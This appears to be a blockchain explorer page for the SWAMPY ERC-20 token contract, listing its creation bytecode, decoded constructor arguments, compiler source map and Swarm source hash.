d1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef91016109e5565b47610fa7836110f9565b6000610fb347836110b7565b6040519091506001600160a01b0384169082156108fc029083906000818181858888f19350505050158015610fec573d6000803e3d6000fd5b5050505050565b6000826000036110055750600061056b565b60006110118385611499565b90508261101e85836114b0565b14610d4d5760405162461bcd60e51b815260206004820152602160248201527f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f6044820152607760f81b6064820152608401610640565b6000610d4d83836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f00000000000081525061124b565b6000610d4d83836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250610cb4565b604080516002808252606082018352600092602083019080368337019050509050308160008151811061112e5761112e6114d2565b6001600160a01b03928316602091820292909201810191909152600654604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa158015611187573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906111ab91906114e8565b816001815181106111be576111be6114d2565b6001600160a01b0392831660209182029290920101526006546111e491309116846108cd565b60065460405163791ac94760e01b81526001600160a01b039091169063791ac9479061121d908590600090869030904290600401611505565b600060405180830381600087803b15801561123757600080fd5b505af1158015610cac573d6000803e3d6000fd5b6000818361126c5760405162461bcd60e51b81526004016106409190611279565b506000610ce584866114b0565b600060208083528351808285015260005b818110156112a65785810183015185820160400152820161128a565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b03811681146112dc57600080fd5b50565b600080604083850312156112f257600080fd5b82356112fd816112c7565b946020939093013593505050565b60008060006060848603121561132057600080fd5b833561132b816112c7565b9250602084013561133b816112c7565b929592945050506040919091013590565b60006020828403121561135e57600080fd5b8135610d4d816112c7565b6000806040838503121561137c57600080fd5b8235611387816112c7565b91506020830135801515811461139c57600080fd5b809150509250929050565b600080604083850312156113ba57600080fd5b82356113c5816112c7565b9150602083013561139c816112c7565b600181811c908216806113e957607f821691505b60208210810361140957634e487b7160e01b600052602260045260246000fd5b50919050565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b634e487b7160e01b600052601160045260246000fd5b8082018082111561056b5761056b611444565b8181038181111561056b5761056b611444565b60006020828403121561149257600080fd5b5051919050565b808202811582820484141761056b5761056b611444565b6000826114cd57634e487b7160e01b600052601260045260246000fd5b500490565b634e487b7160e01b600052603260045260246000fd5b6000602082840312156114fa57600080fd5b8151610d4d816112c7565b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b818110156115555784516001600160a01b031683529383019391830191600101611530565b50506001600160a01b0396909616606085015250505060800152939250505056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa26469706673582212208607d642a88d6a2b9d31b4a0f4c3d2be59cd46cc02fca6335cc26b1c2101478364736f6c63430008130033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

00000000000000000000000000000000000000000000000000000000000001a000000000000000000000000000000000000000000000000000000000000001e0000000000000000000000000000000000000000000000000000000003b9aca00000000000000000000000000000000000000000000000000000000000000001200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000feecc2e045b57ff4d69b04837e2f8da41a06b33e000000000000000000000000000000000000000000000000000000000000032000000000000000000000000000000000000000000000000000000000000003200000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d000000000000000000000000214338920010bdf9d3e101987eb82742061ca89b000000000000000000000000e0a608d9f919ed38eb73dfbb9d891ebedb0f512a000000000000000000000000000000000000000000000000000000000000006400000000000000000000000000000000000000000000000000000000000000065357414d5059000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000065357414d50590000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : name_ (string): SWAMPY
Arg [1] : symbol_ (string): SWAMPY
Arg [2] : supply_ (uint256): 1000000000
Arg [3] : decimals_ (uint8): 18
Arg [4] : parameters (tuple): System.Collections.Generic.List`1[Nethereum.ABI.FunctionEncoding.ParameterOutput]
Arg [5] : uniswapV2Router_ (address): 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
Arg [6] : refInfo_ (tuple): System.Collections.Generic.List`1[Nethereum.ABI.FunctionEncoding.ParameterOutput]

-----Encoded View---------------
17 Constructor Arguments found :
Arg [0] : 00000000000000000000000000000000000000000000000000000000000001a0
Arg [1] : 00000000000000000000000000000000000000000000000000000000000001e0
Arg [2] : 000000000000000000000000000000000000000000000000000000003b9aca00
Arg [3] : 0000000000000000000000000000000000000000000000000000000000000012
Arg [4] : 0000000000000000000000000000000000000000000000000000000000000000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000000
Arg [6] : 000000000000000000000000feecc2e045b57ff4d69b04837e2f8da41a06b33e
Arg [7] : 0000000000000000000000000000000000000000000000000000000000000320
Arg [8] : 0000000000000000000000000000000000000000000000000000000000000320
Arg [9] : 0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d
Arg [10] : 000000000000000000000000214338920010bdf9d3e101987eb82742061ca89b
Arg [11] : 000000000000000000000000e0a608d9f919ed38eb73dfbb9d891ebedb0f512a
Arg [12] : 0000000000000000000000000000000000000000000000000000000000000064
Arg [13] : 0000000000000000000000000000000000000000000000000000000000000006
Arg [14] : 5357414d50590000000000000000000000000000000000000000000000000000
Arg [15] : 0000000000000000000000000000000000000000000000000000000000000006
Arg [16] : 5357414d50590000000000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

33547:6757:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9642:100;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12027:210;;;;;;;;;;-1:-1:-1;12027:210:0;;;;;:::i;:::-;;:::i;:::-;;;1188:14:1;;1181:22;1163:41;;1151:2;1136:18;12027:210:0;1023:187:1;33629:39:0;;;;;;;;;;-1:-1:-1;33629:39:0;;;;-1:-1:-1;;;;;33629:39:0;;;;;;-1:-1:-1;;;;;1404:32:1;;;1386:51;;1374:2;1359:18;33629:39:0;1215:228:1;10799:108:0;;;;;;;;;;-1:-1:-1;10887:12:0;;10799:108;;;1594:25:1;;;1582:2;1567:18;10799:108:0;1448:177:1;12729:454:0;;;;;;;;;;-1:-1:-1;12729:454:0;;;;;:::i;:::-;;:::i;33843:24::-;;;;;;;;;;-1:-1:-1;33843:24:0;;;;-1:-1:-1;;;;;33843:24:0;;;10624:100;;;;;;;;;;-1:-1:-1;10707:9:0;;10624:100;;10707:9;;;;2441:36:1;;2429:2;2414:18;10624:100:0;2299:184:1;13602:300:0;;;;;;;;;;-1:-1:-1;13602:300:0;;;;;:::i;:::-;;:::i;33677:28::-;;;;;;;;;;-1:-1:-1;33677:28:0;;;;-1:-1:-1;;;;;33677:28:0;;;10980:177;;;;;;;;;;-1:-1:-1;10980:177:0;;;;;:::i;:::-;-1:-1:-1;;;;;11131:18:0;11099:7;11131:18;;;;;;;;;;;;10980:177;29582:148;;;;;;;;;;;;;:::i;:::-;;36690:123;;;;;;;;;;;;;:::i;33812:22::-;;;;;;;;;;;;;;;;33874:26;;;;;;;;;;;;;;;;28940:79;;;;;;;;;;-1:-1:-1;29005:6:0;;;;;-1:-1:-1;;;;;29005:6:0;28940:79;;33907:22;;;;;;;;;;;;;;;;9861:104;;;;;;;;;;;;;:::i;14415:400::-;;;;;;;;;;-1:-1:-1;14415:400:0;;;;;:::i;:::-;;:::i;11380:216::-;;;;;;;;;;-1:-1:-1;11380:216:0;;;;;:::i;:::-;;:::i;36858:182::-;;;;;;;;;;-1:-1:-1;36858:182:0;;;;;:::i;:::-;;:::i;33782:23::-;;;;;;;;;;;;;;;;33746:27;;;;;;;;;;;;;;;;11669:201;;;;;;;;;;-1:-1:-1;11669:201:0;;;;;:::i;:::-;-1:-1:-1;;;;;11835:18:0;;;11803:7;11835:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;11669:201;34231:38;;;;;;;;;;-1:-1:-1;34231:38:0;;;;;:::i;:::-;;;;;;;;;;;;;;;;29885:281;;;;;;;;;;-1:-1:-1;29885:281:0;;;;;:::i;:::-;;:::i;9642:100::-;9696:13;9729:5;9722:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9642:100;:::o;12027:210::-;12146:4;12168:39;220:10;12191:7;12200:6;12168:8;:39::i;:::-;-1:-1:-1;12225:4:0;12027:210;;;;;:::o;12729:454::-;12869:4;12886:36;12896:6;12904:9;12915:6;12886:9;:36::i;:::-;12933:220;12956:6;220:10;13004:138;13060:6;13004:138;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;13004:19:0;;;;;;:11;:19;;;;;;;;220:10;13004:33;;;;;;;;;;:37;:138::i;:::-;12933:8;:220::i;:::-;-1:-1:-1;13171:4:0;12729:454;;;;;:::o;13602:300::-;220:10;13717:4;13811:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;13811:34:0;;;;;;;;;;13717:4;;13739:133;;13789:7;;13811:50;;13850:10;13811:38;:50::i;29582:148::-;29152:6;;-1:-1:-1;;;;;29152:6:0;;;;;220:10;29152:22;29144:67;;;;-1:-1:-1;;;29144:67:0;;;;;;;:::i;:::-;;;;;;;;;29673:6:::1;::::0;29652:40:::1;::::0;29689:1:::1;::::0;29673:6:::1;::::0;::::1;-1:-1:-1::0;;;;;29673:6:0::1;::::0;29652:40:::1;::::0;29689:1;;29652:40:::1;29703:6;:19:::0;;-1:-1:-1;;;;;;29703:19:0::1;::::0;;29582:148::o;36690:123::-;29152:6;;-1:-1:-1;;;;;29152:6:0;;;;;220:10;29152:22;29144:67;;;;-1:-1:-1;;;29144:67:0;;;;;;;:::i;:::-;10887:12;;36744:11:::1;:27:::0;10887:12;;36782:7:::1;:23:::0;36690:123::o;9861:104::-;9917:13;9950:7;9943:14;;;;;:::i;14415:400::-;14535:4;14557:228;220:10;14607:7;14629:145;14686:15;14629:145;;;;;;;;;;;;;;;;;220:10;14629:25;;;;:11;:25;;;;;;;;-1:-1:-1;;;;;14629:34:0;;;;;;;;;;;;:38;:145::i;11380:216::-;11502:4;11524:42;220:10;11548:9;11559:6;11524:9;:42::i;36858:182::-;29152:6;;-1:-1:-1;;;;;29152:6:0;;;;;220:10;29152:22;29144:67;;;;-1:-1:-1;;;29144:67:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;36943:26:0;::::1;;::::0;;;:17:::1;:26;::::0;;;;;;;;:37;;-1:-1:-1;;36943:37:0::1;::::0;::::1;;::::0;;::::1;::::0;;;36998:34;;1163:41:1;;;36998:34:0::1;::::0;1136:18:1;36998:34:0::1;;;;;;;36858:182:::0;;:::o;29885:281::-;29152:6;;-1:-1:-1;;;;;29152:6:0;;;;;220:10;29152:22;29144:67;;;;-1:-1:-1;;;29144:67:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;29988:22:0;::::1;29966:110;;;::::0;-1:-1:-1;;;29966:110:0;;4502:2:1;29966:110:0::1;::::0;::::1;4484:21:1::0;4541:2;4521:18;;;4514:30;4580:34;4560:18;;;4553:62;-1:-1:-1;;;4631:18:1;;;4624:36;4677:19;;29966:110:0::1;4300:402:1::0;29966:110:0::1;30113:6;::::0;30092:38:::1;::::0;-1:-1:-1;;;;;30092:38:0;;::::1;::::0;30113:6:::1;::::0;::::1;;::::0;30092:38:::1;::::0;;;::::1;30141:6;:17:::0;;-1:-1:-1;;;;;30141:17:0;;::::1;;;-1:-1:-1::0;;;;;;30141:17:0;;::::1;::::0;;;::::1;::::0;;29885:281::o;17806:380::-;-1:-1:-1;;;;;17942:19:0;;17934:68;;;;-1:-1:-1;;;17934:68:0;;4909:2:1;17934:68:0;;;4891:21:1;4948:2;4928:18;;;4921:30;4987:34;4967:18;;;4960:62;-1:-1:-1;;;5038:18:1;;;5031:34;5082:19;;17934:68:0;4707:400:1;17934:68:0;-1:-1:-1;;;;;18021:21:0;;18013:68;;;;-1:-1:-1;;;18013:68:0;;5314:2:1;18013:68:0;;;5296:21:1;5353:2;5333:18;;;5326:30;5392:34;5372:18;;;5365:62;-1:-1:-1;;;5443:18:1;;;5436:32;5485:19;;18013:68:0;5112:398:1;18013:68:0;-1:-1:-1;;;;;18094:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;18146:32;;1594:25:1;;;18146:32:0;;1567:18:1;18146:32:0;;;;;;;;17806:380;;;:::o;37665:1735::-;-1:-1:-1;;;;;37808:16:0;;;;:41;;-1:-1:-1;;;;;;37828:21:0;;37842:6;37828:21;37808:41;37807:84;;;;37867:24;37882:4;37888:2;37867:14;:24::i;:::-;37807:112;;;-1:-1:-1;37908:11:0;;37807:112;37789:669;;;37946:33;37962:4;37968:2;37972:6;37946:15;:33::i;:::-;37665:1735;;;:::o;37789:669::-;38069:11;;38059:6;:21;;38033:123;;;;-1:-1:-1;;;38033:123:0;;5717:2:1;38033:123:0;;;5699:21:1;5756:2;5736:18;;;5729:30;5795:34;5775:18;;;5768:62;-1:-1:-1;;;5846:18:1;;;5839:38;5894:19;;38033:123:0;5515:404:1;38033:123:0;38183:13;;-1:-1:-1;;;;;38177:19:0;;;38183:13;;38177:19;38173:274;;-1:-1:-1;;;;;11131:18:0;;38217:32;11131:18;;;;;;;;;;;38351:7;;38314:33;38341:6;11131:18;38314:33;:::i;:::-;:44;;38284:147;;;;-1:-1:-1;;;38284:147:0;;6388:2:1;38284:147:0;;;6370:21:1;6427:2;6407:18;;;6400:30;6466:31;6446:18;;;6439:59;6515:18;;38284:147:0;6186:353:1;38284:147:0;38198:249;38173:274;38517:4;38468:28;11131:18;;;;;;;;;;;38573:12;;38549:36;;;;;;;38600:22;;-1:-1:-1;38612:10:0;;-1:-1:-1;;;38612:10:0;;;;38611:11;38600:22;:39;;;;-1:-1:-1;;;;;;38627:12:0;;;;;;:6;:12;;;;;;;;38626:13;38600:39;38596:307;;;38656:10;:17;;-1:-1:-1;;;;38656:17:0;-1:-1:-1;;;38656:17:0;;;38716:20;38757:19;;38753:104;;38831:9;;38797:44;;38814:15;;-1:-1:-1;;;;;38831:9:0;38797:16;:44::i;:::-;-1:-1:-1;38873:10:0;:18;;-1:-1:-1;;;;38873:18:0;;;38596:307;38931:10;;-1:-1:-1;;;;;38956:23:0;;38915:12;38956:23;;;:17;:23;;;;;;38931:10;-1:-1:-1;;;38931:10:0;;;;;38930:11;;38956:23;;:48;;-1:-1:-1;;;;;;38983:21:0;;;;;;:17;:21;;;;;;;;38956:48;38952:96;;;-1:-1:-1;39031:5:0;38952:96;39064:7;39060:287;;;39088:12;39103:30;39127:5;39103:19;39114:7;;39103:6;:10;;:19;;;;:::i;:::-;:23;;:30::i;:::-;-1:-1:-1;;;;;39152:10:0;;;;;;:6;:10;;;;;;39088:45;;-1:-1:-1;39152:10:0;;39148:89;;;39190:31;39215:5;39190:20;39201:8;;39190:6;:10;;:20;;;;:::i;:31::-;39183:38;;39148:89;39260:16;:6;39271:4;39260:10;:16::i;:::-;39251:25;;39293:42;39309:4;39323;39330;39293:15;:42::i;:::-;39073:274;39060:287;39359:33;39375:4;39381:2;39385:6;39359:15;:33::i;:::-;37778:1622;;;37665:1735;;;:::o;1652:226::-;1772:7;1808:12;1800:6;;;;1792:29;;;;-1:-1:-1;;;1792:29:0;;;;;;;;:::i;:::-;-1:-1:-1;1832:9:0;1844:5;1848:1;1844;:5;:::i;:::-;1832:17;1652:226;-1:-1:-1;;;;;1652:226:0:o;749:181::-;807:7;;839:5;843:1;839;:5;:::i;:::-;827:17;;868:1;863;:6;;855:46;;;;-1:-1:-1;;;855:46:0;;6879:2:1;855:46:0;;;6861:21:1;6918:2;6898:18;;;6891:30;6957:29;6937:18;;;6930:57;7004:18;;855:46:0;6677:351:1;855:46:0;921:1;749:181;-1:-1:-1;;;749:181:0:o;37424:233::-;-1:-1:-1;;;;;37516:23:0;;37492:4;37516:23;;;:17;:23;;;;;;;;;:48;;-1:-1:-1;;;;;;37543:21:0;;;;;;:17;:21;;;;;;;;37516:48;:133;;;-1:-1:-1;37595:16:0;;37581:64;;-1:-1:-1;;;37581:64:0;;-1:-1:-1;;;;;7263:15:1;;;37581:64:0;;;7245:34:1;7315:15;;;7295:18;;;7288:43;37648:1:0;;37595:16;;37581:54;;7180:18:1;;37581:64:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;:68;37509:140;37424:233;-1:-1:-1;;;37424:233:0:o;15305:610::-;-1:-1:-1;;;;;15445:20:0;;15437:70;;;;-1:-1:-1;;;15437:70:0;;7733:2:1;15437:70:0;;;7715:21:1;7772:2;7752:18;;;7745:30;7811:34;7791:18;;;7784:62;-1:-1:-1;;;7862:18:1;;;7855:35;7907:19;;15437:70:0;7531:401:1;15437:70:0;-1:-1:-1;;;;;15526:23:0;;15518:71;;;;-1:-1:-1;;;15518:71:0;;8139:2:1;15518:71:0;;;8121:21:1;8178:2;8158:18;;;8151:30;8217:34;8197:18;;;8190:62;-1:-1:-1;;;8268:18:1;;;8261:33;8311:19;;15518:71:0;7937:399:1;15518:71:0;15682:108;15718:6;15682:108;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;15682:17:0;;:9;:17;;;;;;;;;;;;:108;:21;:108::i;:::-;-1:-1:-1;;;;;15662:17:0;;;:9;:17;;;;;;;;;;;:128;;;;15824:20;;;;;;;:32;;15849:6;15824:24;:32::i;:::-;-1:-1:-1;;;;;15801:20:0;;;:9;:20;;;;;;;;;;;;:55;;;;15872:35;1594:25:1;;;15801:20:0;;15872:35;;;;;;1567:18:1;15872:35:0;1448:177:1;39408:296:0;39512:21;39546:24;39563:6;39546:16;:24::i;:::-;39583:18;39604:41;:21;39630:14;39604:25;:41::i;:::-;39658:38;;39583:62;;-1:-1:-1;;;;;;39658:26:0;;;:38;;;;;39583:62;;39658:38;;;;39583:62;39658:26;:38;;;;;;;;;;;;;;;;;;;;;39476:228;;39408:296;;:::o;2137:471::-;2195:7;2440:1;2445;2440:6;2436:47;;-1:-1:-1;2470:1:0;2463:8;;2436:47;2495:9;2507:5;2511:1;2507;:5;:::i;:::-;2495:17;-1:-1:-1;2540:1:0;2531:5;2535:1;2495:17;2531:5;:::i;:::-;:10;2523:56;;;;-1:-1:-1;;;2523:56:0;;8938:2:1;2523:56:0;;;8920:21:1;8977:2;8957:18;;;8950:30;9016:34;8996:18;;;8989:62;-1:-1:-1;;;9067:18:1;;;9060:31;9108:19;;2523:56:0;8736:397:1;3084:132:0;3142:7;3169:39;3173:1;3176;3169:39;;;;;;;;;;;;;;;;;:3;:39::i;1213:136::-;1271:7;1298:43;1302:1;1305;1298:43;;;;;;;;;;;;;;;;;:3;:43::i;39712:589::-;39862:16;;;39876:1;39862:16;;;;;;;;39838:21;;39862:16;;;;;;;;;;-1:-1:-1;39862:16:0;39838:40;;39907:4;39889;39894:1;39889:7;;;;;;;;:::i;:::-;-1:-1:-1;;;;;39889:23:0;;;:7;;;;;;;;;;:23;;;;39933:15;;:22;;;-1:-1:-1;;;39933:22:0;;;;:15;;;;;:20;;:22;;;;;39889:7;;39933:22;;;;;:15;:22;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;39923:4;39928:1;39923:7;;;;;;;;:::i;:::-;-1:-1:-1;;;;;39923:32:0;;;:7;;;;;;;;;:32;40000:15;;39968:62;;39985:4;;40000:15;40018:11;39968:8;:62::i;:::-;40069:15;;:224;;-1:-1:-1;;;40069:224:0;;-1:-1:-1;;;;;40069:15:0;;;;:66;;:224;;40150:11;;40069:15;;40220:4;;40247;;40267:15;;40069:224;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;3712:312;3832:7;3867:12;3860:5;3852:28;;;;-1:-1:-1;;;3852:28:0;;;;;;;;:::i;:::-;-1:-1:-1;3891:9:0;3903:5;3907:1;3903;:5;:::i;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:131::-;-1:-1:-1;;;;;642:31:1;;632:42;;622:70;;688:1;685;678:12;622:70;567:131;:::o;703:315::-;771:6;779;832:2;820:9;811:7;807:23;803:32;800:52;;;848:1;845;838:12;800:52;887:9;874:23;906:31;931:5;906:31;:::i;:::-;956:5;1008:2;993:18;;;;980:32;;-1:-1:-1;;;703:315:1:o;1630:456::-;1707:6;1715;1723;1776:2;1764:9;1755:7;1751:23;1747:32;1744:52;;;1792:1;1789;1782:12;1744:52;1831:9;1818:23;1850:31;1875:5;1850:31;:::i;:::-;1900:5;-1:-1:-1;1957:2:1;1942:18;;1929:32;1970:33;1929:32;1970:33;:::i;:::-;1630:456;;2022:7;;-1:-1:-1;;;2076:2:1;2061:18;;;;2048:32;;1630:456::o;2488:247::-;2547:6;2600:2;2588:9;2579:7;2575:23;2571:32;2568:52;;;2616:1;2613;2606:12;2568:52;2655:9;2642:23;2674:31;2699:5;2674:31;:::i;2740:416::-;2805:6;2813;2866:2;2854:9;2845:7;2841:23;2837:32;2834:52;;;2882:1;2879;2872:12;2834:52;2921:9;2908:23;2940:31;2965:5;2940:31;:::i;:::-;2990:5;-1:-1:-1;3047:2:1;3032:18;;3019:32;3089:15;;3082:23;3070:36;;3060:64;;3120:1;3117;3110:12;3060:64;3143:7;3133:17;;;2740:416;;;;;:::o;3161:388::-;3229:6;3237;3290:2;3278:9;3269:7;3265:23;3261:32;3258:52;;;3306:1;3303;3296:12;3258:52;3345:9;3332:23;3364:31;3389:5;3364:31;:::i;:::-;3414:5;-1:-1:-1;3471:2:1;3456:18;;3443:32;3484:33;3443:32;3484:33;:::i;3554:380::-;3633:1;3629:12;;;;3676;;;3697:61;;3751:4;3743:6;3739:17;3729:27;;3697:61;3804:2;3796:6;3793:14;3773:18;3770:38;3767:161;;3850:10;3845:3;3841:20;3838:1;3831:31;3885:4;3882:1;3875:15;3913:4;3910:1;3903:15;3767:161;;3554:380;;;:::o;3939:356::-;4141:2;4123:21;;;4160:18;;;4153:30;4219:34;4214:2;4199:18;;4192:62;4286:2;4271:18;;3939:356::o;5924:127::-;5985:10;5980:3;5976:20;5973:1;5966:31;6016:4;6013:1;6006:15;6040:4;6037:1;6030:15;6056:125;6121:9;;;6142:10;;;6139:36;;;6155:18;;:::i;6544:128::-;6611:9;;;6632:11;;;6629:37;;;6646:18;;:::i;7342:184::-;7412:6;7465:2;7453:9;7444:7;7440:23;7436:32;7433:52;;;7481:1;7478;7471:12;7433:52;-1:-1:-1;7504:16:1;;7342:184;-1:-1:-1;7342:184:1:o;8341:168::-;8414:9;;;8445;;8462:15;;;8456:22;;8442:37;8432:71;;8483:18;;:::i;8514:217::-;8554:1;8580;8570:132;;8624:10;8619:3;8615:20;8612:1;8605:31;8659:4;8656:1;8649:15;8687:4;8684:1;8677:15;8570:132;-1:-1:-1;8716:9:1;;8514:217::o;9270:127::-;9331:10;9326:3;9322:20;9319:1;9312:31;9362:4;9359:1;9352:15;9386:4;9383:1;9376:15;9402:251;9472:6;9525:2;9513:9;9504:7;9500:23;9496:32;9493:52;;;9541:1;9538;9531:12;9493:52;9573:9;9567:16;9592:31;9617:5;9592:31;:::i;9658:980::-;9920:4;9968:3;9957:9;9953:19;9999:6;9988:9;9981:25;10025:2;10063:6;10058:2;10047:9;10043:18;10036:34;10106:3;10101:2;10090:9;10086:18;10079:31;10130:6;10165;10159:13;10196:6;10188;10181:22;10234:3;10223:9;10219:19;10212:26;;10273:2;10265:6;10261:15;10247:29;;10294:1;10304:195;10318:6;10315:1;10312:13;10304:195;;;10383:13;;-1:-1:-1;;;;;10379:39:1;10367:52;;10474:15;;;;10439:12;;;;10415:1;10333:9;10304:195;;;-1:-1:-1;;;;;;;10555:32:1;;;;10550:2;10535:18;;10528:60;-1:-1:-1;;;10619:3:1;10604:19;10597:35;10516:3;9658:980;-1:-1:-1;;;9658:980:1:o

Swarm Source

ipfs://8607d642a88d6a2b9d31b4a0f4c3d2be59cd46cc02fca6335cc26b1c21014783
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.